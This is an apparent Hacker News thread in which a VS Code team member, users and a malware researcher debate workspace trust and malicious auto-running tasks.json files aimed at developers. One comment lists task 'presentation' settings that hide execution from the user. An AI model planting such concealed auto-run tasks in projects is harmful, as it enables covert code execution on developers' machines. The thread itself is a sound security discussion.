HN2new | past | comments | ask | show | jobs | submitlogin

VS Code team member here :wave:

As called out elsewhere, workspace trust is literally the protection here which is being circumvented. You're warned when you open a folder whether you trust the origin/authors with pretty strong wording. Sure you may find this annoying, but it's literally a security warning in a giant modal that forces you to chose.

Even if automatic tasks were disabled by default, you'd still be vulnerable if you trust the workspace. VS Code is an IDE and the core and extensions can execute code based on files within the folder in order to provide rich features like autocomplete, compilation, run tests, agentic coding, etc.

Before workspace trust existed, we started noticing many extensions and core features having their own version of workspace trust warnings popping up. Workspace trust unified this into a single in your face experience. It's perfectly fine to not trust the folder, you'll just enter restricted mode that will protect you and certain things will be degraded like language servers may not run, you don't be able to debug (executes code in vscode/launch.json), etc.

Ultimately we're shipping developer tool that can do powerful things like automating project compilation or dependency install when you open a folder. This attack vector capitalizes on neglectful developers that ignore a scary looking security warning. It certainly happens in practice, but workspace trust is pretty critical to the trust model of VS Code and is also an important part to improve the UX around it as we annoy you a _single_ time when you open the folder, not several times from various components using a JIT notification approach. I recall many discussions happening around the exact wording of the warning, it's a difficult to communicate concept in the small amount of words that it needs to use.

My recommendation is to use the check box to trust the parent or configure trusted folders. I personally have all my safe git clones in a dev/ folder which I configured to trust, but I also have a playground/ folder where I put random projects that I don't know much about and decide at the time I open something.



I suspect that you're relying too heavily on the user here. Even for myself, a very experienced developer, I don't have a flash of insight over what my risk exposure might be for what I'm opening at this moment. I don't have a comprehensive picture of all the implications, all I'm thinking is "I need to open this file and twiddle some text in it". Expecting us to surface from our flow, think about the risks and make an informed decision might on the surface seem like a fair expectation, but in the real world, I don't think it's going to happen.

Your recommendation makes sense as a strategy to follow ahead of time, before you're in that flow state. But now you're relying on people to have known about the question beforehand, and have this strategy worked out ahead of time.

If you're going to rely on this so heavily, maybe you should make that strategy more official, and surface it to users ahead of time - maybe in some kind of security configuration wizard or something. Relying on them to interrupt flow and work it out is asking too much when it's a security question that doesn't have obvious implications.


> I don't have a flash of insight over what my risk exposure might be for what I'm opening at this moment

Maybe I'm too close to it, but the first sentence gives a very clear outline of the risk to me; Trusting this folder means code within it may be executed automatically.

> I don't have a comprehensive picture of all the implications, all I'm thinking is "I need to open this file and twiddle some text in it".

I'm curious what would stop you from opening it in restricted mode? Is it because it says browse and not edit under the button?

> Your recommendation makes sense as a strategy to follow ahead of time, before you're in that flow state.

You get the warning up front when you open a folder though, isn't this before you're in a flow state hacking away on the code?


> Trusting this folder means code within it may be executed automatically.

But as you point out elsewhere, what constitutes code is very context dependent. And the user isn't necessarily going to be sufficiently expert on how Code interacts with the environment to evaluate that context.

> I'm curious what would stop you from opening it in restricted mode?

Even after years of using Code, I don't know the precise definition of "restricted mode". Maybe I ought to, but learning that isn't at the top of my list of priorities.

> You get the warning up front when you open a folder though, isn't this before you're in a flow state hacking away on the code?

NO! Not even close! And maybe this is at the heart of why we're not understanding each other.

My goal is not to run an editor and change some characters, not at all. It's so far down the stack that I'm scarcely aware of it at all, consciously. My goal is to, e.g., find and fix the bug that the Product Manager is threatening to kill me over. In order to do that I'm opening log files in weird locations (because they were set up by some junior teammate or something), and then opening some code I've never seen before because it's legacy stuff 5 years old that nobody has looked at since; I don't even have a full picture of all languages and technologies that might be in use in this folder. But I do know for sure that I need to be able to make what edits may turn out to be necessary half an hour from now once I've skimmed over the contents of this file and its siblings, so I can't predict for sure whether whatever the heck "restricted mode" will do to me will interfere with those edits.

I'm pretty sure that the above paragraph represents exactly what's going on in the user's mind for a typical usage of Code.


Good point about one off edits and logs, thanks for all the insights. I'll pass these discussions on to the feature owner!


Thanks for being part of the discussion. Almost every response from you in this thread however comes off an unyielding, "we decided this and it's 100% right"?

In light of this vulnerability, the team may want to revisit some of these assumptions made.

I guarantee the majority of people see a giant modal covering what they're trying to do and just do whatever gets rid of it - ie: the titlebar that says 'Trust this workspace?' and hit the big blue "Yes" button to quickly just get to work.

With AI and agents, there are now a lot of non-dev "casual" users using VS code because they saw something on a Youtube video too that have no clue what dangers they could face just by opening a new project.

Almost noone is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).


Didn't mean to come off that way, I know a lot of the decisions that were made. One thing I've got from this is we should probably open `/tmp/`, `C:\`, ~/`, etc. in restricted mode without asking the user. But a lot of the solutions proposed like opening everything in restricted mode I highly doubt would ever happen as it would further confusion, be a big change to UX and so on.

With AI the warning needs to appear somewhere, the user would ignore it when opening the folder, or ignore the warning when engaging with agent mode.


> Almost noone is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).

I’m not sure this is possible or non-misleading at the time of granting trust because adding or updating extensions, or changing any content in the folder after trust is granted, can change what will be executed.


For what it's worth, I absolutely agree with the comments saying the warning doesn't clearly communicate the risks. I too had no idea opening a directory in VS Code (that contains a tasks.json file) could cause some code to execute. I understood the risk of extensions but I think that's different, right? i.e. opening a trusted project doesn't automatically install extensions when there's an extensions.json (don't quote me on that, unless that's correct)

To give some perspective: VS Code isn't my primary IDE, it's more like my browsing IDE. I use it to skim a repo or make minor edits, without waiting for IntelliJ to index the world and initialize an obscene number of plugins I apparently have installed by default. Think—fixing a broken build. If I'm only tweaking or reinstalling dependencies because the package-lock file got corrupted and that's totally not something that happened this week, I don't need all the bells and whistles. Actually I want less because restarting the TypeScript service multiple times is painful, even on a high end Mac.

Anyway enough about IntelliJ. This post has some good discussions and I sincerely hope that you (well, and Microsoft) take this feedback seriously and do something about it. I imagine that's hard, as opposed to say <improving some metric collected by telemetry and fed into a dashboard somewhere>, but this is what matters. Remember what Steve Ballmer said about UAC? I don't know if he said anything, but if it didn't work then it's not going to work now.


> I'm curious what would stop you from opening it in restricted mode? Is it because it says browse and not edit under the button?

Have you tried it? It breaks a lot of things that I would not have expected from the dialog. It’s basically regressing to a slightly more advanced notepad.exe with better grepping facilities in some combinations of syntax and plugins.


Isn't that what you would want if you're opening an untrusted codebase?


No, I want syntax highlighting.

In the past, editors could give me syntax highlighting without opening me to vulnerabilities.


Syntax highlighting works perfectly fine in Restricted mode, at least for me.

Perhaps you have some settings you can adjust in your install to get that working?

Check the docs on this page: https://code.visualstudio.com/docs/editing/workspaces/worksp...


> I'm curious what would stop you from opening it in restricted mode? Is it because it says browse and not edit under the button?

loss of syntax highlighting and to a lesser extent the neovim plugin. maybe having some kind of more granular permission system or a whitelist is the answer here.

opening a folder in vscode shouldn't be dangerous.


> opening a folder in vscode shouldn't be dangerous.

You're not "opening a folder" though, you're opening a codebase in an IDE, with all the integrations and automations that implies, including running code.

As a developer it's important to understand the context in which you're operating.

If you just want to "open a folder" and browse the contents, that's literally what Restricted mode is for. What you're asking to do is already there.


I've been using VS Code for many years and I try pretty hard to be a security aware dev.

I checkout all code projects into ~/projects. I don't recall ever seeing a trust/restricted dialogue box. But, I'm guessing, at some point in the distant past, I whitelisted that folder and everything under it.

I've only just now, reading through this thread, realized how problematic that is. :o/


Syntax highlighting should work if the highlighting is provided by a textmate grammar, it will not work if it's semantic highlighting provided by an extension and that extension requires workspace trust. If it's possible to highlight without executing code, that sounds like an extension issue for whatever language it is. I believe extensions are able to declare whether they should activate without workspace trust and also to query the workspace trust state at runtime.


The funny part is that everyone expects you to make an informed decision about your security, without even providing any data to make that decision.

A better strategy would be:

- (seccomp) sandbox by default

- dry run, observe accessed files and remember them

- display dialog, saying: hey this plugin accesses your profile folder with the passwords.kdbx in it? You wanna allow it?

In an optimum world this would be provided by the operating system, which should have a better trust model for executing programs that are essentially from untrustable sources. The days where you exactly know what kind of programs are stored in your folders are long gone, but for whatever reason no operating system has adapted to that.

And before anyone says the tech isn't there yet: It is, actually, it's called eBPF and XDP.


You also get problems with overwarning causing warning fatigue. Home Assistant uses VS Code as its editor (or at least the thing you use to replace the built-in equivalent of Windows Notepad) and every single time I want to edit a YAML config file I first have to swat away two or three warnings about how dangerous it is to edit the file that I created that's stored on the local filesystem. So my automatic reaction to the warnings is "Go away [click] Go away [click] Go away [click], fecking Microsoft".


I’d like more granular controls - sometimes I don’t want to trust the entire project but I do want to trust my elements of it


How is this any different than anything else devs do? Devs use `curl some-url | sh`. Devs download python packages, rust crates, ruby gems, npm packages, all of them run code.

At some point the dev has to take responsibility.


Devs download python packages, rust crates, ruby gems, npm packages, all of them run code.

You allow developers to download and run arbitrary packages? Where I came from, that went out years ago. We keep "shrinkwrap" servers providing blessed versions of libraries. To test new versions, and to evaluate new packages, there's a highly-locked-down lab environment.


Sorry, but this reply is just ridiculous. There's more to being a developer than just writing a bunch of code in a flow state. And it's silly to claim you're so deep in "flow" that you can't be bothered to read and understand a security popup.

If that's how you work, then you're part of the problem.


Please don't cross into personal attack, regardless of how wrong someone is or you feel they are.

https://hackernews.hn/newsguidelines.html


Yes. If you "can't" read the security popup that very clearly tells you that this is a risky action and you should only do it if you trust the repo, then it's either a reading comprehension issue, and you should take remedial classes - or you're intentionally ignoring it, and so deeply antisocial and averse to working with other people.

Both of those things are extremely bad in any work environment and I would never hire someone displaying either of those traits.


I think it would be better to defer the Workspace trust popup and immediately open in restricted mode; maybe add an icon for it in the bottom info bar & have certain actions notify the user that they'd have to opt in before they'd work.

Because right now you are triggering the cookie banner reflex where a user just instinctively dismisses any warnings, because they want to get on with their work / prevent having their flow state broken.

There should also probably be some more context in the warning text on what a malicious repo could do, because clearly people don't understand why are you are asking if you trust the authors.

And while you're at it, maybe add some "virus scanner" that can read through the repo and flag malicious looking tasks & scripts to warn the user. This would be "AI" based so surely someone could even get a job promotion out of this for leading the initiative :)


Some JIT notification to enable it and/or a status bar/banner was considered, but ultimately this was chosen to improve the user experience. Instead of opening a folder, having it restricted and editing code being broken until you click some item in the status bar, it's asked up front.

It was a long time ago this was added (maybe 5 years?), but I think the reasoning there was that since our code competency is editing code, opening it should make that work well. The expectation is that most users should trust almost all their windows, it's an edge case for most developers to open and browse unfamiliar codebases that could contain such attacks. It also affects not just code editing but things like workspace settings so the editor could work radically different when you trust it.

You make a good point about the cookie banner reflex, but you don't need to use accept all on those either.


IMO this is a mistake, for basically the same reason you justify it with. Since most people just want the code to work, and the chances of any specific repo being malicious is low, especially when a lot of the repos you work with are trusted or semi-trusted, it easily becomes a learned behavior to just auto accept this.

Trust in code operates on a spectrum, not a binary. Different code bases have vastly different threat profiles, and this approach does close to nothing to accomodate for that.

In addition, code bases change over time, and full auditing is near impossible. Even if you manually audit the code, most code is constantly changing. You can pull an update from git, and the audited repo you trusted can be no longer trustworthy.

An up front binary and persistent, trust or don't trust model isn't a particularly good match match for either user behavior or the potential threats most users will face.


So why not allow for enabling this behavior as a configuration option? A big fat banner for most users (i.e. by default) and the few edge cases get the status bar entry after they asked for it.


I find this reply concerning. If its THE security feature, then why is "Trust" a glowing bright blue button in a popup that pop up at the startup forcing a decision. That makes no sense at all. Why not a banner with the option to enable those features when needed like Office tools have.

Also the two buttons have the subtexts of either "Browse folder in restricted mode" or "Trust folder and enable all features", that is quite steering and sounds almost like you cannot even edit code in the restricted mode.

"If you don't trust the authors of these files, we recommend to continue in restricted mode" also doesn't sound that criticial, does it?


Dunno how to break it to you but most of the people using AI the most, they are not very good at computers.

I think with AI we quickly progress to level where it needs to essentially run in nice lil isolated sandbox with underlying project (and definitely everything else around it) being entirely read only (in form on overlay FS or some similar solution), let it work in the sandbox and then have user only accept the result at end of the session in form of a separate process that applies the AI changes as set of commits (NOT commiting direct file changes back as then malicious code could say mess stuff up in .git dir like adding hooks). That way at very worst you're some commit reverts out in main repo.


AI certainly made everything in this area more complicated. I 100% agree about sandboxing and we have people investing in this right now, there's an early opt-in version we just landed recently in Insiders.


Interesting! Is there a pointer to an issue where this feature is described by chance?


>You're warned when you open a folder whether you trust the origin/authors with pretty strong wording.

I can see the exact message you're referring to in the linked article. It says "Code provides features that *may* automatically execute files in this folder." It keeps things ambiguous and comes off as one of the hundreds of legal CYA pop-ups that you see throughout your day. Its not clear that "Yes, I trust the authors" means "Go ahead and start executing shell scripts". Its also not clear what exactly the difference is between the two choices regarding how usable the IDE is if you say no.


"May" is the most correct word though, it's not guaranteed and VS Code (core) doesn't actually know if things will execute or not as a result of this due to extensions also depending on the feature. Running the "Manage Workspace Trust" command which is mentioned in the [docs being linked][0] to goes into more detail about what exactly is blocked, but we determined this is probably too much information and instead tried to distill it to simplify the decision. That single short sentence is essentially what workspace trust protects you from.

My hope has always been, but I know there are plenty of people that don't do this, is to think "huh, that sounds scary, maybe I should not trust it or understand more", not blinding say they trust.

[0]: https://code.visualstudio.com/docs/editing/workspaces/worksp...


The grey bar at the top that says "this is an untrusted workspace" is really annoying & encourages users to trust all workspaces.


It's intentionally prominent as you're in a potentially very degraded experience. You can just click the x to hide it which is remembered the next time you open the folder. Not having this banner be really obvious would lead to frustrated users who accidentally/unknowingly ended up in this state and silly bug reports wasting everyone's time about language services and the like not working.


imo there's nothing "degraded" about editing text without arbitrary code execution. that's what text editors are supposed to do.


Visual Studio Code was announced from day one as a lightweight development environment, not as a "text editor".


Meet the new Microsoft - same as the old one. This is the same reasoning that led to a decade of mindnumbingly obvious exploits against Internet Explorer. You've got to create secure defaults. You have to ask whether your users really want or need some convenience that comes at the expense of an increased attack surface.


Hi, I'm one of the researchers that identified this threat and I blogged about it back in November (https://opensourcemalware.com/blog/contagious-interview-vsco...)

First, @Tyriar thanks for being a part of this conversation. I know you don't have to, and I want to let you know I get that you are choosing to contribute, and I personally appreciate it.

The reality is that VS Code ships in a way that is perfect for attackers to use tasks files to compromise developers:

1. You have to click "trust this code" on every repo you open, which is just noise and desensitizes the user to the real underlying security threat. What VS Code should do is warn you when there is a tasks file, especially if there is a "command" parameter in that tasks file.

2. You can add parameters like these to tasks files to disable some of the notification features so devs never see the notifications you are talking about: "presentation": { "reveal": "never", "echo": false, "focus": false, "close": true, "panel": "dedicated", "showReuseMessage": false}

3. Regardless of Microsofts observations that opening other people's code is risky, I want to remind you that all of us open other peoples code all day long, so it seems a little duplicitous to say "you'd still be vulnerable if you trust the workspace". I mean, that's kind of our jobs. Your "Workspaces" abstraction is great on paper, especially for project based workflows, but that's not the only way that most of us use VS Code. The issue here is that Microsoft created a new feature (tasks files) that executes things when I open code in VS Code. This is new, and separate from the intrinsic risk of opening other people's code. To ignore that fact to me seems like you are running away from the responsibility to address what you've created.

Because of the above points we are quickly seeing VS Code tasks file become the number one way that developers are being compromised by nation state actors (typically North Korea/Lazarus).

Just search github and you'll see what I mean: https://github.com/search?q=path%3Atasks.json+vercel.app&ref...

There are dozens and dozens of bad guys using this technique right now. Microsoft needs to step up. End of story.


We're planning on switching the default in 1.109 with https://github.com/microsoft/vscode/issues/287073

My main hesitation here was that really it's just a false sense of security though. Tasks is just one of the things this enables, and in the core codebase we are unable to determine what exactly it enables as extensions could do all sorts of things. At a certain point, it's really on the user to not dismiss the giant modal security warning that describes the core risk in the first sentence and say they trust things they don't actually trust.

I've also created these follow ups based on this thread:

- Revise workspace trust wording "Browse" https://github.com/microsoft/vscode/issues/289898 - Don't ask to enable workspace trust in system folders and temp directories https://github.com/microsoft/vscode/issues/289899


Oh wow that's the first time I've heard about those tasks. I would never consent to that and that they are enabled by default and shipped in the .vscode folder where most people probably nevereven would have thought about looking for malicious things that's kind of insane.


would it possible to show to alert only when there are potentials threats instead of every time a folder is open? Like showing a big red alert when opening a folder for the first time with a ".vscode" folder in it?


It's not just the .vscode folder though, the Python extension for example executes code in order to provide language services. How could this threat detection possibly be complete? In this new LLM-assisted world a malicious repository could be as innocuous as a plain text prompt injection attack hidden in a markdown file, or some random command/script that seems like it could be legitimate. There are other mitigations in place and in progress to help with the LLM issue, but it's a hard problem.


This demonstrates the actual real-world problem, though. You're saying "this is a complex problem so I'm going to punt and depend on the user to resolve it". But in real life, the user doesn't even know as much as you do about how Code and its plugins interact with their environment. Knowledgewise, most users are not in a good position to evaluate the dangers. And even those who could understand the implications are concentrating on their goal of the moment and won't be thinking deeply about it.

You're relying the wrong people, and at the wrong time, for this to be very effective.


> It's not just the .vscode folder though, the Python extension for example executes code in order to provide language services.

Which code? Its own Code (which the user already trusts anyway), or code from the workspace (automatically)? My expectation with a language-server is that it never code from the workspace in a way which could result in a side effect outside the server gaining understanding about the code. So this makes little sense?


Your expectation is wrong in this case for almost all languages. The design of Pylance (as is sorta forced by Python itself) chooses to execute Python to discover things like the Python version, and the Python startup process can run arbitrary code through mechanisms like sitecustomize.py or having a Python interpreter checked into the repo itself. To my knowledge, Go is one of the few ecosystems that treats it as a security failure to execute user-supplied code during analysis tasks, many languages have macros or dynamic features that basically require executing some amount of the code being analyzed.


Installing dependencies on folder open is a massive misfeature. I understand that you can't do anything about extensions that also do it but I really hope that you guys see how bad an idea that is for the core editor. "Do I trust the authors of this workspace" is a fundamentally different question than "can I run this code just by looking at it"


> It's perfectly fine to not trust the folder, you'll just enter restricted mode that will protect you and certain things will be degraded like language servers may not run, you don't be able to debug (executes code in vscode/launch.json), etc.

This is the main problem with that dialog: It’s completely unclear to me, as a user, what will and will not happen if I trust a workspace.

I treat the selection as meaning that I’m going to have nothing more than a basic text editor if I don’t trust the workspace. That’s fine for some situations, but eventually I want to do something with the code. Then my only options are to trust everything and open the possibility of something (?) bad happening, or not do any work at all. There’s no visibility into what’s happening, no indication of what might happen, just a vague warning that I’m now on my own with no guardrails or visibility. Good luck.


How about showing the user what the ide will automatically execute upon install?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: